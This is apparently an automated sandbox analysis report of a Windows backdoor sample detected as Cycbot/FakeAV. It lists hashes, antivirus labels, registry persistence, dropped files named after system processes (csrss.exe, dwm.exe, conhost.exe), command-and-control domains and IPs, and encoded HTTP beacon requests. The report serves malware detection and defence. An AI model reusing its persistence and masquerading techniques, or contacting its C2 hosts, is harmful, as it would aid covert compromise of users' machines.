Analysis Date: 2014-07-03 00:49:18
MD5: 30b20e27faf03463ea1d75b8c5b2cd8f
SHA1: 3c5e1f5bf2477876b27b84d0a111340b663d1c56

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 4d43ca00317668071c98dc85b66c5632 sha1: 75d394f026a7aa3c3e0349a65777f333d2043290 size: 158208
Section .rdata: md5: be38128c87059c301cddd21296e3d2bc sha1: 12abf39d31d47f1b4d21ce82479857cd7085e2c7 size: 2560
Section .data: md5: 1428404a3af6705e571d2ac7d37cfdc8 sha1: fa4ba0d898ae79b8ee0c6a5459c0ddbb4cd24af0 size: 19456
Section .crt: md5: abaf94c21655a721a5918d1f7d24ca0e sha1: 028b3c39e8698b5dea0db2e033d2bd27b2defda1 size: 512
Timestamp: 2005-10-15 02:50:25
Version: PrivateBuild: 1090
PEhash: 54b5efee11eb8a8ced6eb37b7f71cd19a71fbfda
IMPhash: d995bf56099ac59253b629326031a54a
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Agent.psa.35
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-100689
AV Dr. Web: Trojan.DownLoader1.60512
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.KFV
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Trojan-Downloader:W32/Agent.DQLH
AV Grisoft (avg): Cryptic.CCK
AV Ikarus: Gen.Variant.Kazy
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Norman: winpe/Cycbot.BH
AV Rising: Trojan.Win32.Generic.127647D7
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen2
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: offlineservermonitoring.com
Winsock DNS: zonetk.com
Winsock DNS: zonere.com
Winsock DNS: thebestpageintheuniverse.net

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: thebestpageintheuniverse.net (Type: A) ➝ 216.22.0.192
DNS: zonetf.com (Type: A) ➝ 208.73.211.246
DNS: zonetf.com (Type: A) ➝ 208.73.211.235
DNS: zonetf.com (Type: A) ➝ 208.73.211.233
DNS: zonetf.com (Type: A) ➝ 208.73.211.174
DNS: zonetf.com (Type: A) ➝ 208.73.210.219
DNS: zonere.com (Type: A) ➝ 8.5.1.39
DNS: offlineservermonitoring.com (Type: A)
DNS: zonetk.com (Type: A)
HTTP GET: http://thebestpageintheuniverse.net/d.cgi?tq=gP4aKydUm7KnipgFn%2Byc6A9HYFRj%2Fk5ewpeQ0NpPdlo%2BOZzl9YPH4KSvmGINQGWAgXd0oVhulXrlGnsUo1iNkMAQLEJcw69Fn93HNKWaI7bGQ7S5v91XFuNROna5oo1VPC0ysTO6O3%2FJ39u9aYOMjXCb4YEM%2B4HXgNbcLYS391hWAVIHxu1VGxmVQ9P88S7zgI1u1Bp5fcHT1roA9o0a3jDoe%2FCyqeZTZaKPv2dn7U6rdoWQFsSC9Vf7qGnVPFocSrioDf0qaFCEAyZeRjW2hvE397EOzty5UjFg4k3pDXmHny7Sq2Jdqa4EeEiEe%2F9Qmq7gWtuN%2BywbZRCVXLzgg8DJVLJgZkSJQoLQmih9T%2Bmoe13PgMcmL%2Bvur3AJrC5NaF%2BXvsXiLjRY%2FIhnOgLY0ICdnvRocD5ENpce6xajtJ5RDxKGouJeiDG7RdCl1OcVw8tMNbwpCYm7yX4U2gffdVBzxocn8KooLn4KyQicR5f%2FVk04BdSDuo8qQ4nX8hmnnQH%2Fx63jiStFz%2FGaQNtzcj%2BL11rc66e4LhgUQ%2F5n9MZ0UQ2jrY3XvtR8pHwfA9YD%2FAMxZJuPrQp0A%2FM7am3Www7lzW9IVSbxMXT9T%2FgEzFlvA0PJmf2ZmTFwbKb%2BChxp5M8hHJVtdSXKbXI2Wr8IZ%2B3CpLSpOSgUOJRE8PW
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://zonere.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQj1OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
Flows TCP: 192.168.1.1:1031 ➝ 216.22.0.192:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1033 ➝ 8.5.1.39:80

Raw Pcap
Strings
040904b0
1090
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
ADVAPI32.dll
CloseHandle
CoCreateGuid
CoCreateInstance
CoInitialize
CoSetProxyBlanket
CoUninitialize
CreateFileA
@.data
DeleteCriticalSection
EnterCriticalSection
EnumResourceNamesA
EnumSystemLocalesA
ExitProcess
GetClassLongA
GetCommandLineA
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetFullPathNameA
GetFullPathNameW
GetLastError
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetThreadPriority
GetUserDefaultLCID
GetVersionExA
GlobalAlloc
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
IsValidLocale
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
MessageBoxW
MultiByteToWideChar
ole32.dll
RaiseException
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExW
RegSetValueExW
RPCRT4.dll
RtlUnwind
SetCommConfig
SetEndOfFile
SetStdHandle
SetUnhandledExceptionFilter
SHCreateDirectoryExW
SHELL32.dll
SHFileOperationW
SHGetFolderPathW
StringFromGUID2
TerminateProcess
!This program cannot be run in DOS mode.
UnhandledExceptionFilter
USER32.dll
UuidCreate
WideCharToMultiByte
WriteConsoleA
WriteConsoleW
WriteFile